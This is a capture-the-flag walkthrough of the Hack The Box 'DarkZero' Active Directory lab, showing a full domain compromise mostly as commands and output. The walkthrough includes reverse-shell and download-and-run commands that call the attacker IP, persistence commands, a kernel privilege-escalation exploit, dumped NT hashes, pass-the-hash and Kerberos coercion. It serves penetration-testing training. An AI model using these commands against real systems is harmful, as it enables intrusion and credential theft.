Here are my notes on the DarkZero box from Hack The Box.
DARKZERO: 10.10.11.89
As is common in real-life pentests, you start the DarkZero box with credentials for a low-privileged domain account: john.w / RFulUtONCOL!
john.w:RFulUtONCOL!
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
bloodhound-python -c All -u john.w -p RFulUtONCOL! -d darkzero.htb --dns-tcp -ns 10.10.11.89
faketime -f $(ntpdate -q darkzero.htb | awk '{print $4}') bash
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-16 01:09:22Z)
sudo GetUserSPNs.py darkzero.htb/john.w:'RFulUtONCOL!' -dc-ip 10.10.11.89 -request -save -outputfile GetUserSPNs.out
No entries Found !
sudo GetNPUsers.py -k -dc-ip 10.10.11.89 darkzero.htb/ -usersfile users.txt
#NOPE.
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/Timeroast]
└─# python3 timeroast.py 10.10.11.89
2602:$sntp-ms$66f372caa765d57cb7c1eb054119ed40$1c0111e900000000000a92334c4f434cecc2f892ef77fae3e1b8428bffbfcd0aecc3b951df98a14cecc3b951df98ce98
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/Timeroast]
└─# ls
extra-scripts LICENSE README.md timeroast.ps1 timeroast.py
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/Timeroast]
└─# cd ..
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# ls
10.10.11.89 BLOOD ldap-people pre2k SYSVOL Timeroast timeroasting.py usernames users.txt
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# sudo leafpad time-hash.txt
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# python3 timeroasting.py time-hash.txt /usr/share/seclists/Passwords/darkweb2017-top10000.txt
0 passwords recovered.
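Added example (my code, not from the note or the Timeroast project): an offline checker for the $sntp-ms$ lines that timeroast.py prints, doing the same computation as hashcat mode 31300. The 48-byte salt is the SNTP reply, the key is the NT hash (MD4 over the UTF-16LE password), and the check is MD5(NT hash || salt). MD4 is implemented inline because hashlib on OpenSSL 3 systems often refuses it. PAGE_LINE is the RID 2602 line from the run above; the demo salt, the password Summer2025! and the short wordlist are constructed so the cracker has something to find.

```python
"""Offline check of Timeroast ($sntp-ms$) hashes, i.e. hashcat mode 31300.

Line format printed by timeroast.py:  <rid>:$sntp-ms$<md5 hex>$<48-byte salt hex>
Check: md5( MD4(utf16le(password)) || salt ) == md5 hex
"""
import hashlib
import struct
from typing import Iterable, Optional, Tuple

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (OpenSSL 3 builds of hashlib often lack md4)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # little-endian bit length
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: F = (b & c) | (~b & d)
            a = _rotl((a + ((b & c) | (~b & d)) + x[i]) & _MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G = majority(b, c, d)
            a = _rotl((a + ((b & c) | (b & d) | (c & d)) + x[r2[i]] + 0x5A827999) & _MASK,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H = b ^ c ^ d
            a = _rotl((a + (b ^ c ^ d) + x[r3[i]] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & _MASK, (b0 + b) & _MASK, (c0 + c) & _MASK, (d0 + d) & _MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def sntp_ms_hash(password: str, salt: bytes) -> str:
    """Hash a candidate the way the DC keyed the SNTP reply: MD5 over NT hash || salt."""
    return hashlib.md5(nt_hash(password) + salt).hexdigest()


def parse_timeroast_line(line: str) -> Tuple[int, str, bytes]:
    rid_str, rest = line.strip().split(":", 1)
    _, tag, digest, salt_hex = rest.split("$")
    if tag != "sntp-ms" or len(digest) != 32 or len(salt_hex) != 96:
        raise ValueError(f"not a Timeroast line: {line!r}")
    return int(rid_str), digest.lower(), bytes.fromhex(salt_hex)


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry that reproduces the digest, else None."""
    _rid, digest, salt = parse_timeroast_line(line)
    for candidate in wordlist:
        if sntp_ms_hash(candidate, salt) == digest:
            return candidate
    return None


# Real line from the timeroast.py run above (RID 2602, a computer account on DC01).
PAGE_LINE = ("2602:$sntp-ms$66f372caa765d57cb7c1eb054119ed40$"
             "1c0111e900000000000a92334c4f434cecc2f892ef77fae3e1b8428bffbfcd0a"
             "ecc3b951df98a14cecc3b951df98ce98")

# Constructed demo: a made-up salt and a password we chose, so the cracker can succeed.
DEMO_SALT = bytes(range(48))
DEMO_PASSWORD = "Summer2025!"
DEMO_LINE = f"1234:$sntp-ms${sntp_ms_hash(DEMO_PASSWORD, DEMO_SALT)}${DEMO_SALT.hex()}"
DEMO_WORDLIST = ["password", "Welcome1", "Summer2025!", "P@ssw0rd"]

if __name__ == "__main__":
    print("md4('') =", md4(b"").hex())   # 31d6cfe0d16ae931b73c59d7e0c089c0, the empty NT hash (Guest above)
    print("demo    :", crack(DEMO_LINE, DEMO_WORDLIST))
    print("RID 2602:", crack(PAGE_LINE, DEMO_WORDLIST))
```

Timeroast only helps when a computer account still carries a human-chosen password (pre-created or reset by an admin); a normal machine password is 120 random characters, which is why a 10k wordlist recovered nothing here.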
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
ldapsearch -H ldap://10.10.11.89 -x -W -D "john.w@darkzero.htb" -b "dc=darkzero,dc=htb" '(objectClass=person)' > ldap-people #base DN must match the domain, darkzero.htb
445/tcp open microsoft-ds?
crackmapexec smb 10.10.11.89 -u 'john.w' -p 'RFulUtONCOL!'
crackmapexec smb 10.10.11.89 -u 'john.w' -p 'RFulUtONCOL!' --shares
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/BLOOD]
└─# crackmapexec smb 10.10.11.89 -u 'john.w' -p 'RFulUtONCOL!' --shares
SMB 10.10.11.89 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.89 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.10.11.89 445 DC01 [+] Enumerated shares
SMB 10.10.11.89 445 DC01 Share Permissions Remark
SMB 10.10.11.89 445 DC01 ----- ----------- ------
SMB 10.10.11.89 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.89 445 DC01 C$ Default share
SMB 10.10.11.89 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.89 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.89 445 DC01 SYSVOL READ Logon server share
nxc ldap 10.10.11.89 -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 --bloodhound --collection All
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 --bloodhound --collection All
faketime -f $(ntpdate -q darkzero.htb | awk '{print $4}') bash
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 --bloodhound --collection All #WORKS !
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/BLOOD]
└─# nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 --bloodhound --collection All
SMB dc01.darkzero.htb 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
LDAPS dc01.darkzero.htb 636 DC01 [+] darkzero.htb\john.w
LDAPS dc01.darkzero.htb 636 DC01 Resolved collection methods: trusts, container, localadmin, acl, objectprops, group, psremote, dcom, rdp, session
LDAPS dc01.darkzero.htb 636 DC01 Using kerberos auth without ccache, getting TGT
LDAP dc01.darkzero.htb 389 DC01 Done in 00M 25S
LDAPS dc01.darkzero.htb 636 DC01 Compressing output into /root/.nxc/logs/DC01_dc01.darkzero.htb_2025-11-15_204215_bloodhound.zip
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M maq
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/BLOOD]
└─# nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M maq
SMB dc01.darkzero.htb 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
LDAPS dc01.darkzero.htb 636 DC01 [+] darkzero.htb\john.w
MAQ dc01.darkzero.htb 389 DC01 [*] Getting the MachineAccountQuota
MAQ dc01.darkzero.htb 389 DC01 MachineAccountQuota: 10
MachineAccountQuota = 10 (the default): john.w can add computer objects to darkzero.htb. Noted for later; not needed on this path.
nxc smb dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M webdav
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/BLOOD]
└─# nxc smb dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M webdav
SMB dc01.darkzero.htb 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB dc01.darkzero.htb 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
#NOTHING.
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M ldap-checker
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/BLOOD]
└─# nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M ldap-checker
SMB dc01.darkzero.htb 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
LDAPS dc01.darkzero.htb 636 DC01 [+] darkzero.htb\john.w
LDAP-CHE... dc01.darkzero.htb 389 DC01 [-] 111 is not a valid PaDataType
LDAP-CHE... dc01.darkzero.htb 389 DC01 [-] Connection fail, exiting now
#NOPE.
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 --kerberoasting output.txt
smbclient.py darkzero.htb/john.w:'RFulUtONCOL!'@10.10.11.89
sudo lookupsid.py john.w@10.10.11.89 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# cat users.txt
Administrator
Guest
krbtgt
DC01$
darkzero-ext$
john.w
# darkzero-ext$ is not a computer: it is the trust account for the darkzero.ext forest (NetBIOS name darkzero-ext). First sign of the second domain.
nxc ldap 10.10.11.89 -k -u users.txt -p '' --asreproast output.txt
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --users
poetry run pre2k auth -u john.w -p 'RFulUtONCOL!' -d darkzero.htb -dc-ip 10.10.11.89 -verbose
poetry run pre2k unauth -d darkzero.htb -dc-ip 10.10.11.89 -inputfile computers.txt
#NOPE.
#Endgame, filed here under port 445: the darkzero.htb Administrator NT hash comes from the DCSync at the end of the MSSQL / trust section below. With it, pass-the-hash straight to DC01.
Administrator:5917507bdf2ef2c2b0a869a1cba40726
nxc smb dc01.darkzero.htb -u Administrator -H '5917507bdf2ef2c2b0a869a1cba40726'
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# psexec.py -hashes :5917507bdf2ef2c2b0a869a1cba40726 administrator@dc01.darkzero.htb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc01.darkzero.htb.....
[*] Found writable share ADMIN$
[*] Uploading file UhJiuYnW.exe
[*] Opening SVCManager on dc01.darkzero.htb.....
[*] Creating service enzK on dc01.darkzero.htb.....
[*] Starting service enzK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.26100.4652]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> whoami
nt authority\system
C:\Windows\System32> hostname
DC01
SYSTEM shell on DC01 via psexec as Administrator (pass-the-hash).
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC01
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EF7E-D912
Directory of C:\Users\Administrator\Desktop
07/31/2025 02:21 PM <DIR> .
03/23/2025 07:38 PM <DIR> ..
11/17/2025 03:02 AM 34 root.txt
11/17/2025 03:02 AM 34 user.txt
2 File(s) 68 bytes
2 Dir(s) 6,256,390,144 bytes free
C:\Users\Administrator\Desktop> type user.txt
[REDACTED]
C:\Users\Administrator\Desktop> type root.txt
[REDACTED]
USER.TXT: [REDACTED]
ROOT.TXT: [REDACTED]
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
mssqlclient.py john.w:'RFulUtONCOL!'@10.10.11.89
mssqlclient.py john.w:'RFulUtONCOL!'@10.10.11.89 -windows-auth
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# mssqlclient.py john.w:'RFulUtONCOL!'@10.10.11.89 -windows-auth
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)> enable_xp_cmdshell
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (darkzero\john.w guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
----
#EMPTY.
xp_dirtree \\10.10.14.148\test #coerce the SQL service into an outbound SMB auth to our Responder listener
SQL (darkzero\john.w guest@master)> enum_links;
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
----------------- --------------- --------------- ------------
DC02.darkzero.ext darkzero\john.w 0 dc01_sql_svc
# The link maps our darkzero\john.w login to the remote login dc01_sql_svc on DC02, which is dbo in master there (sysadmin-level). Everything sent through the link runs on DC02 with those rights, even though john.w is only guest on DC01.
Responder:
sudo responder -I tun0
[SMB] NTLMv2-SSP Client : 10.10.11.89
[SMB] NTLMv2-SSP Username : darkzero\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::darkzero:64f1c1f987b5a68b[...]
#NOPE: a machine-account (DC01$) NetNTLMv2 is not crackable (random machine password), but it shows the SQL service on DC01 authenticates outbound as DC01$, which matters for the trust attack later.
SQL (darkzero\john.w guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
SQL (darkzero\john.w guest@master)> use_link "DC02.darkzero.ext"
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> enable_xp_cmdshell
INFO(DC02): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC02): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "whoami"
output
--------------------
darkzero-ext\svc_sql
NULL
RCE achieved on DC02 (darkzero.ext) as darkzero-ext\svc_sql, through the linked server.
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "hostname"
output
------
DC02
NULL
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "ipconfig /all"
output
------------------------------------------------------------------------
NULL
Windows IP Configuration
NULL
Host Name . . . . . . . . . . . . : DC02
Primary Dns Suffix . . . . . . . : darkzero.ext
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : darkzero.ext
NULL
Ethernet adapter Ethernet:
NULL
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft Hyper-V Network Adapter
Physical Address. . . . . . . . . : 00-15-5D-F2-5C-01
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.16.20.2(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.20.1
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
NULL
Turn it into a shell with netcat if you can.
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "powershell.exe -c wget http://10.10.14.148/ncat.exe -O C:\Users\svc_sql\ncat.exe"
output
------
NULL
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "C:\users\svc_sql\ncat.exe -nv 10.10.14.148 1234 -e cmd"
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.148] from (UNKNOWN) [10.10.11.89] 52938
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
darkzero-ext\svc_sql
C:\Windows\system32>hostname
hostname
DC02
Turn it into a meterpreter as usual.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.148:4444
[*] Sending stage (200774 bytes) to 10.10.11.89
[*] Meterpreter session 1 opened (10.10.14.148:4444 -> 10.10.11.89:52977) at 2025-11-15 15:08:13 -0500
PRIV ESC:
CVE-2024-30088 PRIV ESC NOTES: #DARKZERO-HTB
DC02 (Windows Server 2022, build 20348.2113) is vulnerable to CVE-2024-30088 (Windows kernel elevation of privilege); Metasploit module windows/local/cve_2024_30088_authz_basep.
Run the exploit against a separate Meterpreter session (set SESSION to a second, idle session): run from the session you are actively using, the session keeps dying; with a fresh one it works, for whatever reason.
powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.148/adPEAS.ps1') #adPEAS from DC02; its trust output is further below
Meterpreter Persistence:
schtasks /create /tn "Updater" /tr "C:\Users\Public\shell.exe" /sc minute /mo 5 /ru SYSTEM
execute -f cmd.exe -a '/c schtasks /create /tn "Updater" /tr "C:\Users\Public\shell.exe" /sc minute /mo 5 /ru SYSTEM' #WITHIN METERPRETER
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "C:\Users\Public\shell.exe"
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter x64/windows darkzero-ext\svc_sql @ DC02 10.10.14.148:5555 -> 10.10.11.89:59470 (172.16.20.2)
4 meterpreter x64/windows darkzero-ext\svc_sql @ DC02 10.10.14.148:5555 -> 10.10.11.89:59478 (172.16.20.2)
msf exploit(windows/local/cve_2024_30088_authz_basep) > set SESSION 4
SESSION => 4
msf exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.14.148:1234
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 1020...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 860
[+] Successfully retrieved winlogon pid: 600
[*] Sending stage (230982 bytes) to 10.10.11.89
[*] Meterpreter session 5 opened (10.10.14.148:1234 -> 10.10.11.89:59481) at 2025-11-16 16:46:42 -0500
meterpreter > shell
Process 1796 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
DC02
SYSTEM shell on DC02 (darkzero.ext).
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
DC02
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is E415-87AD
Directory of C:\Users\Administrator\Desktop
11/16/2025 08:21 PM <DIR> .
09/29/2025 10:14 AM <DIR> ..
11/16/2025 08:26 PM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,344,351,232 bytes free
C:\Users\Administrator\Desktop>type user.txt
type user.txt
[REDACTED]
USER.TXT: [REDACTED]
POST-EXPLOITATION:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:ced37d583d9539558f1068689780bd1f:::
# darkzero$ (RID 1105) is the trust account darkzero.ext keeps for the darkzero.htb trust, the mirror of darkzero-ext$ seen with lookupsid on DC01. Not a host to target, but confirmation of the bidirectional forest trust.
Cross-Forest Attack with TGTDelegation (AbuseTGTDelegation):
adPEAS:
[?] +++++ Checking Forest and Domain Trusts +++++
[+] Found configured forest trusts of 'darkzero.ext':
Target Forest Name: darkzero.htb
TrustDirection: Bidirectional
TopLevelNames: System.DirectoryServices.ActiveDirectory.TopLevelName
TrustedDomainInformation: System.DirectoryServices.ActiveDirectory.ForestTrustDomainInformation
[+] Found configured domain trusts of 'darkzero.ext':
Target Domain Name: darkzero.htb
Target Domain SID: S-1-5-21-1152179935-589108180-1989892463
Flags: DIRECT_OUTBOUND, DIRECT_INBOUND
TrustAttributes: FOREST_TRANSITIVE
netdom query /domain:darkzero.htb trust
PS C:\Users\svc_sql> netdom query /domain:darkzero.htb trust
netdom query /domain:darkzero.htb trust
Direction Trusted\Trusting domain Trust type
========= ======================= ==========
<->       darkzero.ext            Direct
The command completed successfully.
PS C:\Users\svc_sql> Import-Module ActiveDirectory
Import-Module ActiveDirectory
PS C:\Users\svc_sql> Get-ADTrust -Filter *
Get-ADTrust darkzero.htb -Server darkzero.ext | Select Name, Direction, TrustAttributes, TGTDelegation
PS C:\Users\svc_sql> Get-ADTrust darkzero.htb -Server darkzero.ext | Select Name, Direction, TrustAttributes, TGTDelegation
Get-ADTrust darkzero.htb -Server darkzero.ext | Select Name, Direction, TrustAttributes, TGTDelegation
Name Direction TrustAttributes TGTDelegation
---- --------- --------------- -------------
darkzero.htb BiDirectional 8 False
Get-ADTrust darkzero.ext -Server darkzero.htb | Select Name, Direction, TrustAttributes, TGTDelegation
PS C:\Users\svc_sql> Get-ADTrust darkzero.ext -Server darkzero.htb | Select Name, Direction, TrustAttributes, TGTDelegation
Get-ADTrust darkzero.ext -Server darkzero.htb | Select Name, Direction, TrustAttributes, TGTDelegation
Name Direction TrustAttributes TGTDelegation
---- --------- --------------- -------------
darkzero.ext BiDirectional 2056 True
Reading the two trust objects:
darkzero.ext's TDO for darkzero.htb (TrustAttributes 8 = FOREST_TRANSITIVE): TGTDelegation False, so darkzero.ext principals do not get forwardable TGTs for darkzero.htb services.
darkzero.htb's TDO for darkzero.ext (TrustAttributes 2056 = 0x808 = FOREST_TRANSITIVE | CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION): TGTDelegation True, so darkzero.htb principals, DC01$ included, get forwardable TGTs for services in darkzero.ext.
DC02 is a domain controller, so it has unconstrained delegation, and we are SYSTEM on it: coerce DC01$ into authenticating to DC02 and its TGT ends up in DC02's LSASS.
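Added example (my code, not from the note or BloodHound): decode the TrustAttributes values Get-ADTrust printed and say whose TGTs are exposed. Flag values are from MS-ADTS; the rule applied, that the ENABLE_TGT_DELEGATION bit on the trust object held by domain X for domain Y exposes X's principals to unconstrained-delegation hosts in Y, is the reading that matches what happens below (DC01$'s TGT turns up on DC02). The two TrustObject entries mirror the two Get-ADTrust outputs above; held_by is the -Server domain and target is the Name column (an assumption about how the output maps, stated in the code).

```python
"""Decode AD trustAttributes and work out which way TGT delegation flows across a trust.

Flag values: MS-ADTS 6.1.6.7.9 (trustAttributes). Interpretation applied here:
the CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION bit on the trust object that domain X
holds for domain Y lets X's principals receive forwardable TGTs for services in Y,
so an unconstrained-delegation host in Y can collect X's TGTs.
"""
from dataclasses import dataclass
from typing import List

TRUST_ATTRIBUTE_FLAGS = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "QUARANTINED_DOMAIN",          # SID filtering on
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",
    0x0040: "TREAT_AS_EXTERNAL",
    0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}

ENABLE_TGT_DELEGATION = 0x0800
NO_TGT_DELEGATION = 0x0200


def decode_trust_attributes(value: int) -> List[str]:
    """Expand a trustAttributes integer into flag names, lowest bit first."""
    names = [name for bit, name in sorted(TRUST_ATTRIBUTE_FLAGS.items()) if value & bit]
    unknown = value & ~sum(TRUST_ATTRIBUTE_FLAGS)   # bits not in the table above
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:x}")
    return names


def tgt_delegation_enabled(value: int) -> bool:
    """What Get-ADTrust shows as TGTDelegation; the NO_ bit wins if both are set."""
    return bool(value & ENABLE_TGT_DELEGATION) and not value & NO_TGT_DELEGATION


@dataclass(frozen=True)
class TrustObject:
    held_by: str      # domain whose directory holds the TDO (the -Server in Get-ADTrust)
    target: str       # the domain the TDO describes (assumed: the Name column)
    attributes: int   # TrustAttributes as printed


def tgt_exposure(tdos: List[TrustObject]) -> List[str]:
    """One line per direction in which TGTs may be forwarded across the trust."""
    return [
        f"{t.held_by} principals -> unconstrained-delegation hosts in {t.target}"
        for t in tdos
        if tgt_delegation_enabled(t.attributes)
    ]


# The two Get-ADTrust results from the page.
DARKZERO_TRUSTS = [
    TrustObject(held_by="darkzero.ext", target="darkzero.htb", attributes=8),
    TrustObject(held_by="darkzero.htb", target="darkzero.ext", attributes=2056),
]

if __name__ == "__main__":
    for t in DARKZERO_TRUSTS:
        print(f"{t.held_by} -> {t.target}: {t.attributes} = {decode_trust_attributes(t.attributes)}"
              f" TGTDelegation={tgt_delegation_enabled(t.attributes)}")
    for line in tgt_exposure(DARKZERO_TRUSTS):
        print("exposed:", line)
```

The output names darkzero.htb as the side whose accounts can be harvested from darkzero.ext, which is exactly the direction used next: a darkzero.htb machine account (DC01$) coerced into authenticating to DC02.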
Rubeus.exe request monitor /interval:5 /nowrap #Doesn't work: 'request' is not a Rubeus action
Rubeus.exe monitor /interval:5 /nowrap #run as SYSTEM on DC02; watches LSASS for new TGTs
SpoolSample.exe DC01.darkzero.htb DC02.darkzero.ext #PrinterBug coercion attempt from DC01 to DC02
Going back to the MSSQL service on DC01 (as john.w) for a second coercion, this time at DC02 by hostname so Kerberos is used and the SQL service's (DC01$) forwardable TGT is delegated to DC02:
EXEC xp_dirtree '\\DC02.darkzero.ext\share'
Check the Rubeus monitor output again:
[*] 11/18/2025 12:20:10 AM UTC - Found new TGT:
User : DC01$@DARKZERO.HTB
StartTime : 11/17/2025 4:20:05 PM
